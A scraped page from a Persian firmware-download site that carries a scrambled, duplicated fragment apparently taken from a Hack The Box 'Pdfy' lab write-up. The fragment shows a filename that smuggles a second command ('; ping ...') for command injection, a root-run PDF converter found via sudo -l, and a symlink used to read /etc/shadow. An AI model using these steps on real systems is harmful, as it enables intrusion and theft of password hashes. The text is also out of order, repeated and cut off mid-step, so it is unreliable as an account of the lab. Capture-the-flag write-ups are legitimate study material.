تی وی فریمور
TV. Firmware & Software & EMMC & TVUPDATE & PDF

Pdfy Htb Writeup File

mv test.pdf "test.pdf; ping -c 4 10.10.14.XX" Upload the file. A ping request is received on attacker machine → command injection confirmed. Rename PDF to:

sudo -l User www-data can run /usr/local/bin/pdfy as root without password. Running /usr/local/bin/pdfy asks for a PDF filename and converts it. It uses a system call to pdftotext – but with no sanitization. Exploitation Create a symlink to /etc/shadow as a PDF: Pdfy Htb Writeup

Directory scan:

ln -s /etc/shadow shadow.pdf Run:

mv test.pdf "test.pdf; ping -c 4 10.10.14.XX" Upload the file. A ping request is received on attacker machine → command injection confirmed. Rename PDF to:

sudo -l User www-data can run /usr/local/bin/pdfy as root without password. Running /usr/local/bin/pdfy asks for a PDF filename and converts it. It uses a system call to pdftotext – but with no sanitization. Exploitation Create a symlink to /etc/shadow as a PDF:

Directory scan:

ln -s /etc/shadow shadow.pdf Run:

درباره سایت
تی وی فریمور
Firmware & Software & EMMC & TV.UPDATE & PDF
پشتیبانی
  • ایران - تهران- دریاچه چیتگر - برج های پاریز
  • 09126029528
  • 09026029528
  • info@tv-firmware.com
آخرین نظرات
    شبکه های اجتماعی
    نماد اعتماد
    Pdfy Htb Writeup
    کلیه حقوق این وبسایت متعلق به " تی وی فریمور " بوده و هر گونه کپی برداری ممنوع میباشد!
    طبق ماده 12 فصل سوم قانون جرائم رایانه ای کپی برداری از قالب و محتوا پیگرد قانونی خواهد داشت.